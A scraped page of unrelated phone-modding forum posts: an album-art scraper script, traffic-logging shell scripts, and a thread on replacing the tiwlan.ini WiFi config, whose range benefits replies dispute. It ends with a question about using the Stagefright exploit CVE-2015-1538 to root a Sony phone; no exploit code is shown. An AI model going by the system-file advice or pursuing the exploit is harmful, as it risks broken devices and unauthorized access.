Related
I have a script which will look for album art from albumart.org and place it in the proper folder. This is great if you use S2P.
The script assumes a couple things:
- you music is in \storage card\music\$artist\$album
-YOu will need GSFinder
-the folder view dropdown is visible (I scrape the path in the top dropdown to get the artist and album.
-You need to be able to execute the script from within GSFinder. (map script to button, or use a cascading menu that allows you to select the script file)
THe script basically sends the artist and album to the website,
parses the page
then pulls the image that has atag that matches the album
I get about 70% success rate....which is FINE WITH ME!
---------------------------------------------------------
musicroot = "\Storage Card\Music\"
d = windowtext(30,30)
message(d)
d = replace(d,musicroot,"")
arrMusic = split(d,"\")
theartist = arrMusic[1]
thealbum = arrMusic[2]
#message (theartist)
#message (thealbum)
thepath = "\Program Files\MortScripts\"
thefile = "dl1.html"
#connect("Data Network Connect")
connect("The Internet")
Download ("http://albumart.org/index.php?srchkey=" & theartist & "+" & thealbum & "&itempage=1&newsearch=1&searchindex=Music",thepath & thefile)
strParse = ReadFile(thepath&thefile)
mainleft = find(strParse,"main_left")
#message(mainleft)
arttitle = find(strParse, "title=", mainleft)
#message(arttitle)
if (arttitle>0)
srcstart=find(strParse, "src=", arttitle)
imagestart = srcstart + 5
#message("imagestart:" & imagestart)
imageend = find(strParse, ".jpg", imagestart) + 4
#message("imageend:" & imageend)
imagepath=substr(strParse,imagestart,imageend-imagestart)
message(imagepath)
Download (imagepath,musicroot&theartist & "\" & thealbum & "\folder.jpg")
message("refresh folder")
endif
--------------------------------------------------
Hope you enjoy it....I LOVE IT!
[script] reliable interface stats
pro: reliable, works on any Linux; low battery consumption; runs only when necessary
contra: no GUI
prerequisites: script manager able to trigger on network changes
root is not needed, because the script uses the readable-for-all /proc/net/dev interface to gather statistics.
My problem was that I could not find any app that would give me the megabytes sent from/to the device. They would either ignore GPRS, WiFi or count from reboot to reboot, display stupid ads or cost even money without delivering. I'm on a data flatrate with throttling from 200MB up, and I only want to know how much I already "spent".
The following script should run on network changes, but it can be run at any time. You get more data entries in the log files for the various active interfaces when running it more often.
EDIT: it turns out the "network change" event works perfectly for interface wlan0, but not for pdp0, which happens to be the GPRS/G2/G3/G4 packet interface. Maybe "Tasker" does better than "Script Manager" with this, try and find out. What will always work is manual mode: after using an interface, run the script. This will enter the numbers from any interface that traffic into the respective log.
The script is run with zero or one argument. If given, it can be the name of an interface or the string "all" to get just a readout of the current counters of all interfaces that had traffic without logging anything.
The output is lines with bytes, data packets, errornous and dropped packets for "rx" (received) and "tx" (transmitted) for all or the selected interfaces. Without arguments all active interfaces are logged to separate files in /sdcard/. If you want to change this directory or the names or the date format, well, it should be easy to adapt.
Note that this first script does only data gathering as to the byte counts and it must run on network events. See below for the script(s) that do evaluation according to date to find out how much to go until throttling.
Code:
#!/system/bin/sh
want_if="${1:-*}"
all=""
case "-${want_if}" in
-all)
want_if="*"; all=all;
;;
esac
log_prefix="/mnt/sdcard/interface-stats"
now="$(date '+%d.%m.%y-%H:%M:%S')"
# rx: bytes packets errs drop fifo frame compressed multicast
# tx: bytes packets errs drop fifo colls carrier compressed
# lo: 4944 74 0 0 0 0 0 0 4944 74 0 0 0 0 0 0
# wlan0: 42447725 41554 302 0 0 0 0 0 3280981 33753 0 0 0 0 0 0
while read intf rb rp re rd x x x x tb tp te td rest
do
case "-${intf}" in
-${want_if:-*}:)
case "${rb}--${tb}" in
0--0) continue;;
esac
stats="rx: $rb $rp $re $rd tx: $tb $tp $te $td"
intf_="${intf%:}"
echo "${intf} ${stats}"
[ -z "${all}" ] &&
echo "${now} ${stats}" >> "${log_prefix}-${intf_}.txt"
;;
esac
done < /proc/net/dev
exit 0
Here's the script to output the megabytes. It gets zero, one or two arguments, the first being a date pattern that needs to match the dates in the log file, the second the name of said logg.
An optional third argument, if given, gives debug output. Use only if the number doesn't look plausible.
It doesn't need any special privileges and can be run anytime.
If less than one megabyte has been hit so far, then the output is the number of bytes. Due to limitations of "awk" there can still be decimals in the output!
Code:
# /home/ino/interface-stats.sh _date: 20120225-2103_
# vim: set filetype=sh ts=4:
# -*- mode: sh; -*-
#
# <url:man:1 awk>
# sample:
#
# 25.02.12-02:28:28 rx: 182909647 374371 462 0 tx: 681742703 542899 0 0
# 25.02.12-12:15:00 rx: 3 374464 494 0 tx: 5 542974 0 0
#
# at around noon the device was rebooted, so the stats start at low
# values.
#
# algorithm:
#
# initialize old-accumulator and offset to zero.
#
# since received and transmitted bytes are accumulated by the kernel,
# the script has to just store the sum of the received and transmitted
# bytes into an accumulator, unless the current value is less than the
# running count. this happens after a reboot. so store this first low
# value into $offset, store the old accumulator and keep the running game
# until either the next reboot or EOF. now
# accumulator = old-accumulator + accumulator - offset.
awk_prog='
BEGIN {
debug = debug > 0
accu=0
accu_old=0
offset=0
accu_sum=0
# megabytes
mb_scaler=1024*1024
# field definitions
rx_bytes=3
rx_packets=4
rx_errors=5
rx_dropped=6
tx_bytes=8
tx_packets=9
tx_errors=10
tx_dropped=11
# date pattern
# 25.02.12-12:15:00 rx: 3 374464 494 0 tx: 5 542974 0 0
pat_date_dflt = "[0-9][0-9]\.[0-9][0-9]\.[0-9][0-9]-[0-9][0-9]:[0-9][0-9]:[0-9][0-9]"
pat_date = length(pat_date) == 0 ? pat_date_dflt : pat_date
}
function dbg(x) {
if (debug > 0) print("debug: " x);
}
# no particular validity check: if there are 11 fields and the first one
# matches the date the user is after, we will use the record.
(NF == 11) && ($1 ~ pat_date) {
dbg("select line: " $0)
accu_sum = $rx_bytes + $tx_bytes
if (accu_sum < accu) {
dbg("break: accu_sum=" accu_sum "; accu_old=" accu_old "; accu=" accu "; offset=" offset);
accu = accu_old + accu - offset
accu_old = accu
offset = accu_sum
accu = accu_sum
} else {
accu = accu_sum
}
}
END {
dbg("eof: accu_sum=" accu_sum "; accu_old=" accu_old "; accu=" accu "; offset=" offset);
accu = accu_old + accu - offset
if (accu > mb_scaler) accu = (accu / mb_scaler) "MB"
print(accu)
}
'
debug=0
log_prefix="/mnt/sdcard/interface-stats"
dates="${1:-.}"
want_if="${2:-wlan0}"
debug="${3+1}"
input="${log_prefix}-${want_if}.txt"
awk -v pat_date="${dates}" -v debug="${debug}" "${awk_prog}" "${input}"
And finally this one is for quick inspection of a logg. Gets the name of an interface as argument if needed. Again it needs no privileges and is appropriate for use as a SMwidget.
Code:
#!/system/bin/sh
want_if="${1:-wlan0}"
log_prefix="/mnt/sdcard/interface-stats"
logg="${log_prefix}-${want_if}.txt"
[ -r "${logg}" ] &&
while read tim rx rb rp re rd tx tb tp te td rest
do
case "${rb}--${tb}" in
0--0) continue;;
esac
stats="rx: $rb $rp $re $rd tx: $tb $tp $te $td"
echo "${tim} ${stats}"
done < "${logg}"
exit 0
Does somebody know what tags to brace code with in order to keep formatting intact? To me all my stuff has no indentation and lines seem to break at other points than just and only newlines!
EDIT: just found out that there's no problem in the web view, it's just the "forum runner" that can't render what the "\[ code \]" tag generates.
Well, as an alternative, what's the least-hassle file dump?
Hi
I have discovered how to enable N standard and 5ghz band in ics
1. go to /system/etc/firmware
2. find these files names
PHP:
fm_rx_init_1273.2.bts
fm_tx_init_1273.2.bts
fmc_init_1273.2.bts
If they are their u can apply 5ghz band .. But if they aren't .. U won't get 5ghz band
Now for gb users
4.Go to /system/etc/ and find tiwlan.ini
Note: In CM7 based ROMs the path may be /system/etc/wifi
5.Look for the following lines:
PHP:
HT_Enable=0
BurstModeEnable =0
WifiAdhoc=0
Single_Dual_Band_Solution =0
To
PHP:
HT-Enable=1
BurstModeEnable =1
WifiAdhoc=1
Single_Dual_Band_Solution =1
Reboot your phone and have fun
U can see all that in orher threads .. But in ics u cann't find 1st 3 of these lines
So i have discovered a way to enable that in ics
Now for ics users
1-Go to /system/etc/ and find tiwlan.ini
Note: In CM7 based ROMs the path may be /system/etc/wifi
2-open tiwlan.ini with text editor
Select all words and delete
after that past these lines .. It is from gb and it workes on ics
PHP:
# Note: The letters in this file are NOT case sensitive.
IniVersion = 0 # compatibility version between the ini file and the wlan driver
SmeConnectMode = 1 #0 - auto, 1 - manual
ScanResultAging = 0 # in Second - range 0..1000
WME_Enable = 1 #0=diable WME support / 1=Enable
dot11NetworkType = 3 #2 - A only mode, 3 - B/G mode, 4 - A/G Dual mode
SmeScanGChannelList = 1,2,3,4,5,6,7,8,9,10,11,12,13,14
SmeScanAChannelList = 36,40,44,48,52,56,60,64
RecoveryEnable = 1 #0 -Disabled 1- Enabled
BThWlanCoexistEnable = 1 #0 - SG disable, 1 - SG protective
TxCompleteThreshold = 3
RxAggregationPktsLimit = 8
RxInterruptThreshold = 3 #0 - Rx Pacing disable
QOS_txBlksThresholdVO = 2 # Reserved Blks for voice
#
# Power Manager
#
BeaconListenInterval = 1 # the number of N-Beacon or N-DTim
DtimListenInterval = 1 #
dot11PowerMode = 0 #0 - Auto
#1 - Active
#2 - Short Doze
#3 - Long Doze
AutoPowerModeDozeMode = 3 #2 - Short Doze
#3 - Long Doze
AutoPowerModeActiveTh = 0 #packets per second
AutoPowerModeDozeTh = 0 #packets per seconds - threshold for entering ELP in Auto mode
AutoPowerModeInterval = 100
defaultPowerLevel = 0 #0 - ELP
#1 - PD
#2 - AWAKE
PowerSavePowerLevel = 0 #0 - ELP
#1 - PD
#2 - AWAKE
TxPower = 205 #set Default Tx Power Level in DBM * 10
dot11FragmentationThreshold = 4096
dot11RTSThreshold = 4096
WPAMixedMode= 1
RSNPreAuthentication = 1
CalibrationChannel24 = 1
CalibrationChannel5 = 36
# Regulatury Domain tables.
# Each byte correlates to one channel in sequential order. Table 2.4 starts from channel 1, Table 5.0 starts from channel 36.
# Bits 0..4 - Max power allowed in Dbm.
# Bit 6 - Channel is allowed for Active scan
# BIt 7 - Channel is allowed
AllowedChannelsTable24 = FFFFFFFFFFFFFFFFFFFFFFFFFFFF
AllowedChannelsTable5 = FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF0000000000000000000000000000000000000000000000000000000000000000000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF0000000000000000FF000000FF000000FF000000FF000000FF000000000000000000000000000000
SpectrumManagement = 0 # 0 - Disable 802.11h, 1 - Enable
RxBroadcastInPs = 1
#arp ip filter - must be written 8 characters for example 10.2.43.3 -> 0a 02 2b 21 and not a 2 2b 21
ArpIp_Addr = 0a 02 0a b7
ArpIp_Filter_ena = 0
#mac filter
Mac_Filter_Enabled = 0
numGroupAddrs = 4
Group_addr0 = 10 01 02 03 04 05
Group_addr1 = 11 11 12 13 14 15
Group_addr2 = 12 21 22 23 24 25
Group_addr3 = 13 31 32 33 34 35
Group_addr4 = 14 41 42 43 44 45
Group_addr5 = 15 51 52 53 54 55
Group_addr6 = 16 61 62 63 64 65
Group_addr7 = 17 71 72 73 74 75
#beacon filter
Beacon_Filter_Desired_State = 1
Beacon_Filter_Stored = 1
#beacon IE table
#the size is the len of the string - spaces = number of bytes
Beacon_IE_Num_Of_Elem = 16
Beacon_IE_Table_Size = 37
Beacon_IE_Table = 00 01 01 01 32 01 2a 01 03 01 06 01 07 01 20 01 25 01 23 01 30 01 28 01 2e 01 3d 01 85 01 dd 01 00 52 f2 02 00 01
# rate policy - short / long retries
RatePolicyUserShortRetryLimit = 10
RatePolicyUserLongRetryLimit = 10
#rate policies
#rates guide: -->>mcs7,msc6,mcs5,mcs4,mcs3,mcs2,mcs1,mcs0,54,58,36,24,22,18,12,11,9,6,5.5,2,1
OsDbgState = 0x01e9003c # -1 or 0xffffffff -all (opens debug messages in o.s. only - sevirity+modules)
#############################################################
# Configure the severity table (0 = Disable/ 1 = Enable)
#
# Byte #0: Init
# Byte #1: Information
# Byte #2: Warning
# Byte #3: Error
# Byte #4: Fatal Error
# Byte #5: SM
# Byte #6: Console
#############################################################
ReportSeverityTable = 00001101
BeaconReceiveTime = 50
#
# QOS UPSD
#
desiredPsMode = 1 # Global Power save delivery protocol (1 - UPSD, 0 - Legacy)
QOS_wmePsModeBE = 0 # Power save delivery protocol for BE AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeBK = 0 # Power save delivery protocol for BK AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeVI = 0 # Power save delivery protocol for VI AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeVO = 1 # Power save delivery protocol for VO AC (1 - UPSD, 0 - Legacy)
#
# QOS Classifier
#
Clsfr_Type = 1 # 1 - DSCP, 2 - Port, 3 - IP+port
NumOfCodePoints = 4
DSCPClassifier00_CodePoint = 0 #Best Effort
DSCPClassifier00_DTag = 0
DSCPClassifier01_CodePoint = 8 #Background
DSCPClassifier01_DTag = 1
DSCPClassifier02_CodePoint = 40 #Video
DSCPClassifier02_DTag = 5
DSCPClassifier03_CodePoint = 56 #Voice
DSCPClassifier03_DTag = 6
dot11MaxReceiveLifetime=512000
WiFiAdhoc = 1
dot11BeaconPeriod = 100
ConnSelfTimeout = 60000
RRMEnabled = 0
WiFiWmmPS = 0 # Use 1 on WiFi test in order to configure PS to work in WMM mode
TriggeredScanTimeOut = 50000 # Maximum time in Us between 2 channels on triggered scan
# PsPoll delivery failure solution
PsPollDeliveryFailureRecoveryPeriod = 20 # Time in Ms to stay ACTIVE ('0' to disable feature)
ConsecutivePsPollDeliveryFailureThreshold = 4 # Number of failed PsPoll's to start ACTIVE time out
#Auto Rx streaming
PsTrafficPeriod = 20
# Weights in percent for RSSI/SNR Average calculations
RssiBeaconAverageWeight = 20
RssiPacketAverageWeight = 10
SnrBeaconAverageWeight = 20
SnrPacketAverageWeight = 10
HT_Enable=1 # 0 = diable 802.11n support / 1=Enable
IbssProtectionType = 1 # 0 = CTS protaction disable ; 1 = Standard CTS protaction
BurstModeEnable = 1 # 0 - Disabled 1 - Enabled
RoamScanEnable = 1 # 1- roaming and immidate scan enable by deafult 0- allowing roaming ' scannig due to CLI confguration
RoamingOperationalMode = 1 # 0=Manual , 1=Auto
coexDhcpTime = 4000
BaPolicyTid_0 = 3
#============================ Radio parameters - Start ========================
#------- General parameters ------
TXBiPFEMAutoDetect = 0 # Length: 1; Unit: Options (0: Manual Mode, 1: Automatic mode); Format: Unsigned; Source: Customer; Comment: This parameter is used by the FW to decide if the front-end is determined automatically or manually
TXBiPFEMManufacturer = 1 # Length: 1; Unit: Options (0: FEM0, 1: FEM1); Format: Unsigned; Source: Customer; Comment: (bit0) This parameter is used to determine which FEM vendor type is used on the platform
STRFRefClock = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: 5'bXX000 : Bit 0,1,2 - 0: 19.2MHz, 1: 26MHz, 2: 38.4MHz [Default], 3: 52MHz, 4: 38.4MHz XTAL, 5: 26MHz XTAL , 5'bX0XXX : Bit 3 - CLK_REQ type, 0 = wired-OR [Default], 1= push-pull , 5'b0XXXX : Bit 4 - CLK_REQ polarity, 0 = Normal [Default], 1=Inverted
STRFRefClockSettingTime = 5 # Length: 1; Unit: ms (0-15); Format: Unsigned; Source: Customer; Comment: The time from asserting CLK_REQ (low to high) to valid FREF clock on the device inputs
ClockValidOnWakeup = 0 # Length: 1; Unit: Options (0: Reference clock not valid, 1: Reference clock is valid and stable); Format: Unsigned; Source: Customer; Comment: This parameter indicates whether the FREF clock is valid on wakeup
TCXO_Clk = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: 5'bXX000 : Bit 0,1,2 - 0: 19.2MHz, 1: 26MHz, 2: 38.4MHz [Default], 3: 52MHz, 4: 16.368Mhz, 5: 32.736 Mhz
TCXO_SettlingTime = 5 # Length: 1; Unit: ms (0-15); Format: Unsigned; Source: Customer; Comment: The time from asserting CLK_REQ (low to high) to valid TCXO clock on the device inputs
TCXO_ClockValidOnWakeup = 0 # Length: 1; Unit: Options (0: Reference clock not valid, 1: Reference clock is valid and stable); Format: Unsigned; Source: Customer; Comment: This parameter indicates whether the TCXO clock is valid on wakeup
TCXO_LDO_Voltage = 0 # Length: 1; Unit: Options (0:2.5v, 1:2.55v, 2:2.6v); Format: Unsigned; Source: Customer; Comment: TCXO LDO Voltage
Platform_configuration = 2 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer ; Comment: Bit 0: Levelshifter support (0: No LS, 1: With LS), Bit 1,2:Configure IO's [SDIO/wspi] (00- 8mA, 01- 4mA (default), 10- 6mA, 11 - 2mA), Bit 3:Eeprom (0-No Eeprom), Bit 4: SDIO IB Enable sync, Bit 5: SDIO IB Enable async, Bit 6: SDIO IB Enable BlockMode, Bit 7: SDIO High-Speed support
Single_Dual_Band_Solution = 1 # Length: 1; Unit: Options (0: 2.5v, 1: 2.55v, 2: 2.6v); Format: Unsigned; Source: Customer; Comment: This field notifies the FW whether the solution is a single-band or dual-band
Settings = 00,00,00,00 # Length: 4; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: Bit0: NBI (0: Off, 1: On), Bit1: Telec channel 14 (0: Off, 1: On), Bit2: FEM0-LB, Bit3: FEM0-HB, Bit4: FEM1-LB, Bit5: FEM1-HB - TX BiP load (0: Internal, 1: External), Bit6: LPD Low band, Bit7: LPD High band
XTALItrimVal = 4 # Length: 1; Unit: Current trimming for XTAL; Format: Unsigned; Source: TI; Comment: Current trimming for XTAL
SRState = 0 # Length: 1; Unit: Options (0: Disabled, 1: Enabled); Format: Decimal; Source: TI; Comment: Smart Reflax (proprietary mechanism of TI that identify the silicon process specific params) state
SRF1 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,0f,3f # Length: 16; Unit: SRF1 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
SRF2 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,00,00 # Length: 16; Unit: SRF2 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
SRF3 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,00,00 # Length: 16; Unit: SRF3 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
#SR_Debug_Table = 09 04 19 10 01 00 F7 EF E6 DE 00 00 00 00 00 00 # Length: 16; Unit: SR_Debug_Table values; Format: Signed; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_N_P = 11 # Length: 1; Unit: SR_SEN_N_P values; Format: Unsigned; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_N_P_Gain = AA # Length: 1; Unit: SR_SEN_N_P_GAIN values; Format: Unsigned; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_NRN = B6 # Length: 1; Unit: SR_SEN_NRN values; Format: Unsigned; Source: TI ; Comment: SR Debug values - for TI internal use only
#SR_SEN_PRN = F0 # Length: 1; Unit: SR_SEN_PRN values; Format: Unsigned; Source: TI ; Comment: SR Debug values - for TI internal use only
RxTraceInsertionLoss_2_4G = 0 # Length: 1; Unit: 1/8dB; Format: Unsigned; Source: Customer; Comment: This parameter indicates the printed circuit board (PCB) trace insertion loss
TxTraceLoss_2_4G = 00,00,00,00,00,00,00,00,00,00,00,00,00,00 # Length: 14; Unit: 1/8dB; Format: Unsigned; Source: Customer; Comment: This parameter is used to align the output power to a different location on the board
#------------------------------------------------------
#------- Radio parameters for TQS_S_2.6 -------
FemVendorAndOptions = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: Bit 0..1 - 0: RFMD, 1: TQS, 2: SKWS, Bit 4..7 [Version control] - 0: TQS-S1.0, 1: TQS-S2.0, 2: TQS-S2.5, 3: TQS-D1.0, 4: TQS-D1.5, 5: RFMD-S1.5, 6: RFMD-S2.9, 7: RFMD-S3.0, 8: RFMD-D1.5, 9: RFMD-S2.9.5, 10: RFMD-D3.0.1, 11: TQS-S2.6, 12: TQS-D1.7
TxBiPReferencePDvoltage_2_4G = 375 # Length: 1; Unit: 1mV; Format: Unsigned; Source: TI; Comment: This parameter define the reference point of the FEM power detector
TxBiPReferencePower_2_4G = 128 # Length: 1; Unit: 1/8dB; Format: Signed; Source: TI; Comment: Reference output power that produces given reference power detector output voltage . The TX BiP reference power is linked to the TX BiP reference PD voltage
TxBiPOffsetdB_2_4G = 0 # Length: 1; Unit: 1/8dB; Format: Signed; Source: Customer; Comment: This field is used to fine-tune the TX BiP by the customer
TxPerRatePowerLimits_2_4G_Normal = 1d,1f,22,26,27,29,25 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerRatePowerLimits_2_4G_Degraded = 1a,1f,22,25,25,27,23 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerRatePowerLimits_2_4G_Extreme = 16,1d,1e,20,24,25,22 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
DegradedLowToNormalThr_2_4G = 30 # Length: 1; Unit: 1/10 volts; Format: Unsigned; Source: TI; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
NormalToDegradedHighThr_2_4G = 45 # Length: 1; Unit: 1/10 volts; Format: Unsigned; Source: TI; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerChannelPowerLimits_2_4G_11b = 50,50,50,50,50,50,50,50,50,50,50,50,50,50 # Length: 14; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The purpose of this table is to allow clipping of the maximum output power on certain channels
TxPerChannelPowerLimits_2_4G_OFDM = 50,50,50,50,50,50,50,50,50,50,50,50,50,50 # Length: 14; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The purpose of this table is to allow clipping of the maximum output power on certain channels
TxPDVsRateOffsets_2_4G = 01,02,02,02,02,00,02 # Length: 7; Unit: 1/8dB; Format: Signed; Source: TI; Comment: This parameter is a power detector offset value used to correct the power detector curve for each rate group
TxPDVsChannelOffsets_2_4G = 00,00,00,00,00,00,00,00,00,00,00,00,00,00 # Length: 14; Unit: 1/8dB; Format: Signed; Source: TI/Customer; Comment: This parameter is a power detector offset value used to correct the power detector curve for each channel
TxPDVsTemperature_2_4G = 00,00 # Length: 2; Unit: 1/8dB; Format: Signed; Source: TI; Comment: This parameter is a power detector offset value used to correct the power detector curve for each temperture
TxIbiasTable_2_4G = 17,17,17,13,17,17,17,17 # Length: 8; Unit: Codeword ; Format: Unsigned; Source: TI; Comment: This parameter sets the bias current provided by the SoC to the PA in the FEM. Options (MCS7, 54/48, 36/24, 18/12, 9/6, 11b, MCS0, 11bCh14)
RxFemInsertionLoss_2_4G = 14 # Length: 1; Unit: 1/8dB; Format: Unsigned; Source: TI; Comment: This parameter specifies the received insertion loss of the WL128x
#=========================== Radio parameters - End ==========================
#===========================Coexistence Parameters -Start =========================#
# PASSIVE_SCAN_BT_EDR_BT_TIME_MSEC
coexTempParam4 = 30
# PASSIVE_SCAN_BT_EDR_WLAN_TIME_MSEC
coexTempParam5 = 14
#Passive Scan Compensation time for EDR
coexBtPerThreshold = 300
#===========================Coexistence Parameters -End =========================#
If any one wants my tiwlan here
http://www.mediafire.com/?p6553158cnr47wa
U can copy words from it and replace with yours
Have fun
For all ics users that tried this and it worked please reply ..
care to share your source plz?
iONEx said:
care to share your source plz?
Click to expand...
Click to collapse
I agree with iONEx...too 'dangerous' to delete the file and write it ALL back... can you share the file? Please xD
UchihaDareNial said:
I agree with iONEx...too 'dangerous' to delete the file and write it ALL back... can you share the file? Please xD
Click to expand...
Click to collapse
u have to delete its lines and replace these .. I did that .. U can backup ur tiwlan.ini before ..
Anyway i edit it in the original post
Guys,
My st15i have the N wifi problem (AP not in range even in house) since GB 2.3.4 fw .42, upgrade to fw .62 still got the same problem, now i upgrade to fw .431 ICS, still have the porblem, i allready paste tiwlan.ini from this thread and st15i detect my AP, but when i off wifi and on, again my AP router not in range. Info: my AP is TPlink TP-W8961ND. Need help, thankss
what does this do actually?
I tried it and I don't know how to test wether it's work or not?
XDA Premium sent this message from owner of Sk17i
akulan3 said:
Guys,
My st15i have the N wifi problem (AP not in range even in house) since GB 2.3.4 fw .42, upgrade to fw .62 still got the same problem, now i upgrade to fw .431 ICS, still have the porblem, i allready paste tiwlan.ini from this thread and st15i detect my AP, but when i off wifi and on, again my AP router not in range. Info: my AP is TPlink TP-W8961ND. Need help, thankss
Click to expand...
Click to collapse
I am happy to hear that it worked with u
I have this problem too .. Try changing router channel to 11 and try to not disconnect alot
Izzy Stinson said:
what does this do actually?
Click to expand...
Click to collapse
It increases ur android wifi range
shinishi said:
It increases ur android wifi rage
Click to expand...
Click to collapse
cool. does it work on stock gingerbread?
my wifi always gets disconnected by itself whenever im downloading big files and most of the time, while im browsing the android market and appbrain market.
and sometimes after my wifi disconnected, it doesnt reconnect by itself i need to switch off my phone wifi then switch it on back.
can this fix that?
or maybe its my router problem?
UchihaDareNial said:
I tried it and I don't know how to test wether it's work or not?
XDA Premium sent this message from owner of Sk17i
Click to expand...
Click to collapse
It will increase ur android wifi range .. U can use ur wifi at more distance for me router rage is smaller than my home distance so i need some thing like this to use internet at every corner
Izzy Stinson said:
cool. does it work on stock gingerbread?
my wifi always gets disconnected by itself whenever im downloading big files and most of the time, while im browsing the android market and appbrain market.
and sometimes after my wifi disconnected, it doesnt reconnect by itself i need to switch off my phone wifi then switch it on back.
can this fix that?
or maybe its my router problem?
Click to expand...
Click to collapse
The problem is only the distance .
When u r downloading u r not near the router sure ?
So ur phone connection will be weak and may disconnect any time if u put ur phone in ur hand .
When u do this the rage will be larger and ur problem will be solved
Read the original post .. I have written how to do that for gingerbread(gb)try it and tell me the result
shinishi said:
The problem is only the distance .
When u r downloading u r not near the router sure ?
So ur phone connection will be weak and may disconnect any time if u put ur phone in ur hand .
When u do this the rage will be larger and ur problem will be solved
Read the original post .. I have written how to do that for gingerbread(gb)try it and tell me the result
Click to expand...
Click to collapse
when im in my room, my wifi signal is weak 1 bar. and of course near the where my router located my wifi signal is full bar.
i have done an experiment, both full and weak wifi signals, my wfi still gets disconnected when downloading big files, browsing market etc.
im not sure if its router or my phone wifi problems.
i will test it soon if i have time. but i doubt it will fix my problems though. because i have tried your method it is similar as from this thread
http://forum.xda-developers.com/showthread.php?t=1568792
" 9. Enabling WiFi Dual Band and Burst Mode
As the title already, this is to increase the internet speed for WiFi on your phone.
Personally, I didn't notice any difference in battery usage.
Open Root Explorer, go to \system\etc and open file named tiwlan.ini with Text Editor.
Edit these lines:
Code:
HT_Enable=0
BurstModeEnable = 0
WiFiAdhoc = 0
to
Code:
HT_Enable=1
BurstModeEnable = 1
WiFiAdhoc = 1
and
Code:
Single_Dual_Band_Solution = 0
to
Code:
Single_Dual_Band_Solution = 1
Reboot your phone. "
after changing it not just it still doesnt fix my wifi problems, its a huge battery drainer, so had to change the numbers back to the way it was
Oic,thanks for information,and my phone WiFi doesn't disconnect often
By the way,range,not rage lol
XDA Premium sent this message from owner of Sk17i
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Izzy Stinson said:
when im in my room, my wifi signal is weak 1 bar. and of course near the where my router located my wifi signal is full bar.
i have done an experiment, both full and weak wifi signals, my wfi still gets disconnected when downloading big files, browsing market etc.
im not sure if its router or my phone wifi problems.
i will test it soon if i have time. but i doubt it will fix my problems though. because i have tried your method it is similar as from this thread
http://forum.xda-developers.com/showthread.php?t=1568792
" 9. Enabling WiFi Dual Band and Burst Mode
As the title already, this is to increase the internet speed for WiFi on your phone.
Personally, I didn't notice any difference in battery usage.
Open Root Explorer, go to \system\etc and open file named tiwlan.ini with Text Editor.
Edit these lines:
Code:
HT_Enable=0
BurstModeEnable = 0
WiFiAdhoc = 0
to
Code:
HT_Enable=1
BurstModeEnable = 1
WiFiAdhoc = 1
and
Code:
Single_Dual_Band_Solution = 0
to
Code:
Single_Dual_Band_Solution = 1
Reboot your phone. "
after changing it not just it still doesnt fix my wifi problems, its a huge battery drainer, so had to change the numbers back to the way it was
Click to expand...
Click to collapse
For me i saw that battery drain is the same
That thread is for gb only and mine for both gb and ics
Try connect a laptop or another device to ur router
If the problem still .. It will be router problem
Curtis7990 said:
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Click to expand...
Click to collapse
Same with me :3
XDA Premium sent this message from owner of Sk17i
Curtis7990 said:
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Click to expand...
Click to collapse
Welcome i'm Realy happy to hear that .. I have noticed to more battery drain ..
shinishi said:
For me i saw that battery drain is the same
That thread is for gb only and mine for both gb and ics
Try connect a laptop or another device to ur router
If the problem still .. It will be router problem
Click to expand...
Click to collapse
no wifi problems on my laptop or any laptop. just my phone xperia mini pro sk17i had this wifi problems :S
Izzy Stinson said:
no wifi problems on my laptop or any laptop. just my phone xperia mini pro sk17i had this wifi problems :S
Click to expand...
Click to collapse
do you have custom kernel or rom?
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android System. And that seems to be quiet easy - just executing a python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
